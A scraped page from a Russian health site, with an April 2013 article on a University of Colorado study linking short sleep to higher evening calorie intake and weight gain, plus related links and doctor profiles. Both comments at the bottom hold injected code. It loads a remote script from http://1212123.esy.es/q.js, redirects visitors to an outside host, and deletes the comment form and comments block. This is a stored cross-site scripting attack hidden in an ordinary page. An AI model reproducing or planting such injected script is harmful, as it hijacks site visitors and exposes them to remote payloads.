Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Сколько вы спите – на сто...  >>  Сколько вы спите – на столько и толстеете! Сколько же спать, чтобы худеть?
 
Обратная связь
 

Сколько вы спите – на столько и толстеете! Сколько же спать, чтобы худеть?

Размер шрифта
18 апреля 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Все мы любим поспать подольше, не так ли? Оказывается, что полноценный сон позитивно влияет не только на наше настроение и энергичность, но и препятствует появлению лишнего веса.

Специалисты из Университета Колорадо полагают, что полноценный сон помогает бороться с ожирением. «Не думаю, что сон сам по себе способен привести к потере веса», – говорит Кеннет Райт, глава исследования. «Но определенную роль в обмене веществ он, безусловно, играет. Надеемся, что результаты нашей работы убедят людей внимательнее относиться к режиму дня».

В этом исследовании объектами наблюдения ученых стали 16 молодых, здоровых, худых людей, которые в течение двух недель жили в университетской клинике. Они находились в специальной комнате, в которой имелась автоматизированная система контроля освещения. Энергию, которую затрачивали участники исследования, высчитывали в соответствии с изменением объемов дыхательных газов: кислорода и углекислоты.

В первые три дня исследования участникам было позволено спать по девять часов в сутки, при этом их питание по энергетической ценности соответствовало рассчитанной норме. После этого участники были разделены на две группы: первая спала по 5 часов в сутки в течение 5 дней, а вторая – по 9 часов в течение такого же промежутка времени. Участникам предоставили неограниченный доступ к еде. Через 5 дней проводили измерения.

В среднем, те участники, которые спали по 5 часов, затрачивали на 5% энергии больше, но при этом потребляли на 6% больше калорий. Кроме того, они зачастую мало ели на завтрак, зато ужин у них вообще был самым калорийным приемом пищи! Давно известно, что вечерние калории куда активнее переходят в жир, чем утренние.

«Наши данные показывают, что люди, которые мало спят, чаще едят в те часы, когда организм не настроен на пищеварение», – говорит Райт.

Райт с коллегами также заметили, что мужчины и женщины по-разному вели себя в ситуации с неограниченным доступом к еде. Мужчины при этом набирали вес, даже если спали достаточно. Женщины же в аналогичной ситуации не претерпевали изменений в массе тела.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:34

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 23:19

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Хотите не чувствовать боли – спите дольше   Что ваш сон говорит о вашем здоровье   Как уснуть, если мысли бегают в голове   Сбылась мечта студента: уснул, а утром уже все знаешь  
17 апреля 2013Сколько вы спите – на столько и толстеете! Сколько же спать, чтобы худеть? 30 января 2013Хотите не чувствовать боли – спите дольше
 
04 января 2013Сбылась мечта студента: уснул, а утром уже все знаешь 04 октября 2012Чем меньше спишь, тем быстрее теряешь рассудок
 

Слайдшоу

1
Что случилось с моим сном?
Как похудеть ленивой?
Чего не делать, если вы набрали вес?

Тесты

1
Хорошо ли Вы спите?
Нормальный ли у вас сон?
Правильно ли вы худеете?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.